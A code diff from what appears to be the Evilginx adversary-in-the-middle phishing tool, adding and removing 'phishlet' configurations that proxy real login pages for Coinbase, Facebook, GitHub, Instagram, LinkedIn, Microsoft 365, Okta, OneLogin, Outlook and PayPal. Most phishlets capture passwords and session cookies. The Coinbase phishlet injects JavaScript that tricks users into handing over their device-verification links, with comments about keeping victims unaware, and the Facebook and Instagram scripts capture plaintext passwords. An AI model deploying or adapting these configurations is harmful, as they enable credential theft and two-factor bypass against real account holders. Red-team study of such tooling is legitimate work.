- {triggers_on: 'www.coinbase.com', orig_sub: 'dynamic-assets', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'sessions', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'sessions', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'events-service', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'events-service', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'exceptions', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'exceptions', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'images', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'images', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'ws', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'ws', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'googletagmanager.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'googletagmanager.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
|
||||
auth_tokens:
|
||||
- domain: 'www.coinbase.com'
|
||||
keys: ['.*,regexp']
|
||||
auth_urls:
|
||||
- '/dashboard'
|
||||
- '/dashboard/.*'
|
||||
credentials:
|
||||
username:
|
||||
key: 'email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
force_post:
|
||||
- path: '/sessions'
|
||||
search:
|
||||
- {key: 'email', search: '.*'}
|
||||
- {key: 'password', search: '.*'}
|
||||
force:
|
||||
- {key: 'stay_signed_in', value: '1'}
|
||||
type: 'post'
|
||||
- path: '/signin_step_two'
|
||||
search:
|
||||
- {key: 'token', search: '.*'}
|
||||
- {key: 'phone_number_id', search: '.*'}
|
||||
force:
|
||||
- {key: 'remember_computer', value: '1'}
|
||||
type: 'post'
|
||||
|
||||
login:
|
||||
domain: 'www.coinbase.com'
|
||||
path: '/signin'
|
||||
|
||||
|
||||
# "function lp()" will dynamically replace the contents in device authentication html page, and will create a new input box and button. Some other replacements are just to make page look better.
|
||||
# "function ValidateLink()" will replace the domain name 'coinbase.com' with the evilginx server domain name to verify the device from the IP of evilginx server, and will popup a new window with that modified auth link.
|
||||
# In that way we will be able to successfully authenticate the new device login.
|
||||
|
||||
# "function hcaptcha()" will replace the domain name during the captcha validation to decrease the possibility of getting caught by the user.
|
||||
|
||||
js_inject:
|
||||
- trigger_domains: ["www.coinbase.com"]
|
||||
trigger_paths: ["/device_confirmations/new"]
|
||||
trigger_params: [domain]
|
||||
script: |
|
||||
function lp(){
|
||||
var elem1 = document.getElementsByClassName("account-inner")[0];
|
||||
elem1.parentNode.removeChild(elem1);
|
||||
var elem2 = document.getElementsByClassName("device-support")[0];
|
||||
elem2.parentNode.removeChild(elem2);
|
||||
var div = document.createElement('div');
|
||||
div.className = 'account-inner';
|
||||
div.innerHTML = `
|
||||
<img class="account-icon" src="https://www.coinbase.com/assets/quickstart/icon-signup-9ed7432acbf85046d2a12f1e29f9e245d6e8376b379b524a1ebb6250c993f4d1.png">
|
||||
<div class="account-icon"></div>
|
||||
<h2 class="account-header">Authorize This Login</h2>
|
||||
<p>Copy The Verification Link Received in Email And Paste It Below To Verify The Login </p>
|
||||
<form action="">
|
||||
<fieldset>
|
||||
<input type="url" name="linkVerify" id="linkVerify" placeholder="https://coinbase.com/device_confirmations/confirm_email?token=xxxxxxxxxxxxxxxx" pattern="https://.*">
|
||||
<input class="btn" type="button" value="Verify Device" onclick="ValidateLink()">
|
||||
</fieldset></form>
|
||||
<p></p>
|
||||
`;
|
||||
document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div);
|
||||
var div = document.createElement('div');
|
||||
div.className = 'device-support';
|
||||
div.innerHTML = `
|
||||
<p>Email didn't arrive?</p>
|
||||
<p>Visit our <a href="https://support.coinbase.com/customer/portal/articles/2521789">Support Center</a>.</p>
|
||||
<p></p>
|
||||
<p>
|
||||
<a href="/email_recovery/new">
|
||||
I no longer have access to my email address
|
||||
</a> </p>
|
||||
`;
|
||||
document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div);
|
||||
return;
|
||||
}
|
||||
function ValidateLink(){
|
||||
var domain = "{domain}"
|
||||
var link1 = document.getElementById("linkVerify").value;
|
||||
var link2 = link1.replace('coinbase.com', domain);
|
||||
console.log(link2)
|
||||
window.open(link2, '_blank').focus();
|
||||
}
|
||||
setTimeout(function(){ lp(); }, 2500);
|
||||
|
||||
|
||||
# The hCaptcha header that shows the domain name can be replaced dynamically with JavaScript. It is disabled here because it results in an hCaptcha error; find your own way to solve it.
|
||||
#
|
||||
# - trigger_domains: ["www.coinbase.com"]
|
||||
# trigger_paths: ["/signin","/signin*"]
|
||||
# trigger_params: []
|
||||
# script: |
|
||||
# function hcaptcha(){
|
||||
# var elem = document.getElementsByClassName("cf-subheadline")[0];
|
||||
# elem.parentNode.removeChild(elem);
|
||||
# var div = document.createElement('div');
|
||||
# div.className = 'cf-subheadline';
|
||||
# div.innerHTML = `
|
||||
# <h2 class="cf-subheadline"><span data-translate="complete_sec_check">Please complete the security check to get access to</span> Coinbase Website</h2>
|
||||
# `;
|
||||
# document.getElementsByClassName("cf-wrapper cf-header cf-error-overview")[0].appendChild(div);
|
||||
# return;
|
||||
# }
|
20
phishlets/example.yaml
Normal file
@ -0,0 +1,20 @@
min_ver: '3.0.0'
proxy_hosts:
  - {phish_sub: 'academy', orig_sub: 'academy', domain: 'breakdev.org', session: true, is_landing: true, auto_filter: true}
sub_filters:
  - {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.academy.breakdev.org'
    keys: ['cookie_name']
credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'academy.breakdev.org'
  path: '/evilginx-mastery'
@ -1,54 +0,0 @@
|
||||
author: '@charlesbel'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
|
||||
auth_tokens:
|
||||
- domain: '.facebook.com'
|
||||
keys: ['c_user','xs','sb']
|
||||
credentials:
|
||||
username:
|
||||
key: 'email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'unenc_password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
|
||||
|
||||
login:
|
||||
domain: 'www.facebook.com'
|
||||
path: '/login.php'
|
||||
|
||||
js_inject:
|
||||
- trigger_domains: ["www.facebook.com"]
|
||||
trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"]
|
||||
trigger_params: []
|
||||
script: |
|
||||
function onclickListener(){
|
||||
var submit = document.querySelectorAll('button[type=submit]')[0];
|
||||
submit.setAttribute("onclick", "sendPass()");
|
||||
return;
|
||||
}
|
||||
function sendPass(){
|
||||
var password = document.getElementsByName("pass")[0].value;
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", '/login/device-based/regular/login/', true);
|
||||
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
||||
xhr.send("unenc_password="+encodeURIComponent(password));
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){ onclickListener(); }, 1000);
|
@ -1,29 +0,0 @@
|
||||
author: '@audibleblink'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: '', orig_sub: '', domain: 'github.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'api', orig_sub: 'api', domain: 'github.com'}
|
||||
- {phish_sub: 'github', orig_sub: 'github', domain: 'githubassets.com'}
|
||||
|
||||
sub_filters:
|
||||
- {triggers_on: 'github.com', orig_sub: '', domain: 'github.com', search: 'integrity="(.*?)"', replace: '', mimes: ['text/html']}
|
||||
|
||||
auth_tokens:
|
||||
- domain: '.github.com'
|
||||
keys: ['logged_in', 'dotcom_user']
|
||||
- domain: 'github.com'
|
||||
keys: ['user_session', '_gh_sess']
|
||||
|
||||
credentials:
|
||||
username:
|
||||
key: 'login'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
login:
|
||||
domain: 'github.com'
|
||||
path: '/login'
|
@ -1,45 +0,0 @@
|
||||
author: '@charlesbel'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'm', orig_sub: 'm', domain: 'instagram.com', session: true, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.instagram.com', orig_sub: 'www', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
auth_tokens:
|
||||
- domain: '.instagram.com'
|
||||
keys: ['sessionid','.*,regexp']
|
||||
credentials:
|
||||
username:
|
||||
key: 'user'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'unenc_password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'www.instagram.com'
|
||||
path: '/accounts/login'
|
||||
js_inject:
|
||||
- trigger_domains: ["www.instagram.com"]
|
||||
trigger_paths: ["/accounts/login"]
|
||||
trigger_params: []
|
||||
script: |
|
||||
function onclickListener(){
|
||||
var submit = document.querySelectorAll('button[type=submit]')[0];
|
||||
submit.setAttribute("onclick", "sendPass()");
|
||||
return;
|
||||
}
|
||||
function sendPass(){
|
||||
var password = document.getElementsByName("password")[0].value;
|
||||
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", '/accounts/login/ajax/', true);
|
||||
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
||||
xhr.send("unenc_password="+encodeURIComponent(password));
|
||||
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){ onclickListener(); }, 1000);
|
@ -1,36 +0,0 @@
|
||||
author: '@mrgretzky'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
|
||||
sub_filters: []
|
||||
auth_tokens:
|
||||
- domain: '.www.linkedin.com'
|
||||
keys: ['li_at']
|
||||
credentials:
|
||||
username:
|
||||
key: 'session_key'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'session_password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'www.linkedin.com'
|
||||
path: '/uas/login'
|
||||
js_inject:
|
||||
- trigger_domains: ["www.linkedin.com"]
|
||||
trigger_paths: ["/uas/login"]
|
||||
trigger_params: ["email"]
|
||||
script: |
|
||||
function lp(){
|
||||
var email = document.querySelector("#username");
|
||||
var password = document.querySelector("#password");
|
||||
if (email != null && password != null) {
|
||||
email.value = "{email}";
|
||||
password.focus();
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){lp();}, 100);
|
||||
}
|
||||
setTimeout(function(){lp();}, 100);
|
@ -1,37 +0,0 @@
|
||||
name: 'o365'
|
||||
author: '@jamescullum'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing: false}
|
||||
# The lines below are needed if your target organization utilizes ADFS.
|
||||
# If they do, you need to uncomment all following lines that contain <...>
|
||||
# To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
|
||||
# Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as follows (a filled-in example is shown below the commented lines):
|
||||
# <insert-adfs-subdomain> = adfs
|
||||
# <insert-adfs-host> = example.com
|
||||
# <insert-adfs-subdomain-and-host> = adfs.example.com
|
||||
#- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing: false}
#- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing: false}
|
||||
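# For illustration only: with a hypothetical ADFS deployment at adfs.example.com, the first commented line above would become:
#- {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'example.com', session: true, is_landing: false}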
sub_filters:
|
||||
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
|
||||
# Uncomment and fill in if your target organization utilizes ADFS
|
||||
#- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
auth_tokens:
|
||||
- domain: '.login.microsoftonline.com'
|
||||
keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
|
||||
- domain: 'login.microsoftonline.com'
|
||||
keys: ['SignInStateCookie']
|
||||
credentials:
|
||||
username:
|
||||
key: '(login|UserName)'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: '(passwd|Password)'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'login.microsoftonline.com'
|
||||
path: '/'
|
@ -1,23 +0,0 @@
|
||||
author: '@mikesiegel'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false}
|
||||
- {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
|
||||
- {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
|
||||
sub_filters:
|
||||
- {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384-.{64}', replace: '', mimes: ['text/html']}
|
||||
auth_tokens:
|
||||
- domain: 'EXAMPLE.okta.com'
|
||||
keys: ['sid']
|
||||
credentials:
|
||||
username:
|
||||
key: ''
|
||||
search: '"username":"([^"]*)'
|
||||
type: 'json'
|
||||
password:
|
||||
key: ''
|
||||
search: '"password":"([^"]*)'
|
||||
type: 'json'
|
||||
login:
|
||||
domain: 'EXAMPLE.okta.com'
|
||||
path: '/login/login.htm'
|
@ -1,52 +0,0 @@
|
||||
name: 'onelogin'
|
||||
author: '@perfectlylogical'
|
||||
min_ver: '2.3.0'
|
||||
# NOTE: Do not forget to change EXAMPLE to the relevant subdomain.
|
||||
proxy_hosts:
|
||||
- {phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false }
|
||||
- {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'onelogin.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false}
|
||||
# Uncomment this line if the target is using the default CSS for onelogin. Will manifest as the login page not loading.
|
||||
#- {phish_sub: 'web-login-cdn', orig_sub: 'web-login-cdn', domain: 'onelogin.com', session: false, is_landing: false}
|
||||
sub_filters: []
|
||||
auth_tokens:
|
||||
- domain: '.onelogin.com'
|
||||
keys: ['onelogin.com_user']
|
||||
- domain: 'EXAMPLE.onelogin.com'
|
||||
keys: ['sub_session_onelogin.com']
|
||||
auth_urls:
|
||||
- '/portal/'
|
||||
- '/client/apps'
|
||||
# This is used to force the "remember me" functionality if the target is using the /login url.
# This method will not work if they are using the multi-step login method on the /login2 url.
|
||||
force_post:
|
||||
- path: '/sessions'
|
||||
search:
|
||||
- {key: 'authenticity_token', search: '.*'}
|
||||
- {key: 'email', search: '.*'}
|
||||
- {key: 'password', search: '.*'}
|
||||
force:
|
||||
- {key: 'persist_session', value: 'true'}
|
||||
type: 'post'
|
||||
# The post type is used to capture credentials which use the /login url
|
||||
# The json type is used to capture credentials which use the /login2 url
|
||||
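# Note: a YAML mapping cannot hold duplicate keys, so parsers will typically either reject this block or keep only the last username/password pair defined below.
# Keep only one pair active (post for /login, json for /login2) and comment out the other.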
credentials:
|
||||
username:
|
||||
key: 'email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
username:
|
||||
key: 'login'
|
||||
search: '"login":"(.*)"'
|
||||
type: 'json'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '"password":"(.*)",'
|
||||
type: 'json'
|
||||
login:
|
||||
domain: 'EXAMPLE.onelogin.com'
|
||||
path: '/login'
|
@ -1,31 +0,0 @@
|
||||
author: '@mrgretzky'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
auth_tokens:
|
||||
- domain: '.live.com'
|
||||
keys: ['WLSSC','RPSSecAuth']
|
||||
credentials:
|
||||
username:
|
||||
key: 'login'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'passwd'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'outlook.live.com'
|
||||
path: '/owa/?nlp=1'
|
@ -1,70 +0,0 @@
|
||||
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
|
||||
# PLEASE DO NOT MISUSE THIS PHISHLET.
|
||||
|
||||
# The email parameter can be set with the command below:
# lures edit params ID email=test@email.com
# where ID is the lure ID number and test@email.com is the known PayPal account email address of your target.
|
||||
|
||||
author: '@An0nud4y'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'paypal.com', session: true, is_landing: true, auto_filter: true}
|
||||
- {phish_sub: '', orig_sub: '', domain: 'paypal.com', session: true, is_landing: false, auto_filter: true}
|
||||
# - {phish_sub: 'paypalobjects', orig_sub: 'www', domain: 'paypalobjects.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'c', orig_sub: 'c', domain: 'paypal.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'b.stats', orig_sub: 'b.stats', domain: 'paypal.com', session: false, is_landing: false}
|
||||
- {phish_sub: 't', orig_sub: 't', domain: 'paypal.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'c6', orig_sub: 'c6', domain: 'paypal.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'hnd.stats', orig_sub: 'hnd.stats', domain: 'paypal.com', session: false, is_landing: false}
|
||||
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
# - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
# - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
|
